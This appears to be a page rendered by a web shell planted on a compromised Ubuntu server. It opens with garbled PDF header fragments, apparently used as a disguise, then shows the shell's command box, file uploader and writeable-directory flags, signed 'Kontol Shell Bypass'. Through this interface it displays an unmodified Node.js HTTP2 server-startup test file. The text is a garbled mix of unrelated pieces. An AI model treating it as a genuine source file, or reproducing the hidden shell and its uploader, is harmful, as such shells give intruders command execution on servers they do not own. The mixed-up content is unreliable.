%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /proc/self/root/home/ubuntu/node-v16.18.1/test/parallel/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //proc/self/root/home/ubuntu/node-v16.18.1/test/parallel/test-http2-server-startup.js
'use strict';

// Tests the basic operation of creating a plaintext or TLS
// HTTP2 server. The server does not do anything at this point
// other than start listening.

const common = require('../common');
const commonFixtures = require('../common/fixtures');

if (!common.hasCrypto)
  common.skip('missing crypto');

const assert = require('assert');
const http2 = require('http2');
const tls = require('tls');
const net = require('net');

const options = {
  key: commonFixtures.readKey('agent2-key.pem'),
  cert: commonFixtures.readKey('agent2-cert.pem')
};

// There should not be any throws.
const serverTLS = http2.createSecureServer(options, () => {});
serverTLS.listen(0, common.mustCall(() => serverTLS.close()));

// There should not be an error event reported either.
serverTLS.on('error', common.mustNotCall());

const server = http2.createServer(options, common.mustNotCall());
server.listen(0, common.mustCall(() => server.close()));

// There should not be an error event reported either.
server.on('error', common.mustNotCall());

// Test the plaintext server socket timeout.
{
  let client;
  const server = http2.createServer();
  server.on('timeout', common.mustCall(() => {
    server.close();
    if (client)
      client.end();
  }));
  server.setTimeout(common.platformTimeout(1000), common.mustCall());
  server.listen(0, common.mustCall(() => {
    const port = server.address().port;
    client = net.connect(port, common.mustCall());
  }));
}

// Test that `http2.createServer()` supports `net.Server` options.
{
  const server = http2.createServer({ allowHalfOpen: true });

  server.on('connection', common.mustCall((socket) => {
    assert.strictEqual(socket.allowHalfOpen, true);
    socket.end();
    server.close();
  }));

  assert.strictEqual(server.allowHalfOpen, true);

  server.listen(0, common.mustCall(() => {
    const port = server.address().port;
    const socket = net.connect(port, common.mustCall());
    socket.resume();
  }));
}

// Test the secure server socket timeout.
{
  let client;
  const server = http2.createSecureServer(options);
  server.on('timeout', common.mustCall(() => {
    server.close();
    if (client)
      client.end();
  }));
  server.setTimeout(common.platformTimeout(1000), common.mustCall());
  server.listen(0, common.mustCall(() => {
    const port = server.address().port;
    client = tls.connect({
      port: port,
      rejectUnauthorized: false,
      ALPNProtocols: ['h2']
    }, common.mustCall());
  }));
}

// Test that `http2.createSecureServer()` supports `net.Server` options.
{
  const server = http2.createSecureServer({
    allowHalfOpen: true,
    ...options
  });

  server.on('secureConnection', common.mustCall((socket) => {
    assert.strictEqual(socket.allowHalfOpen, true);
    socket.end();
    server.close();
  }));

  assert.strictEqual(server.allowHalfOpen, true);

  server.listen(0, common.mustCall(() => {
    const port = server.address().port;
    const socket = tls.connect({
      port: port,
      rejectUnauthorized: false,
      ALPNProtocols: ['h2']
    }, common.mustCall());
    socket.resume();
  }));
}

Kontol Shell Bypass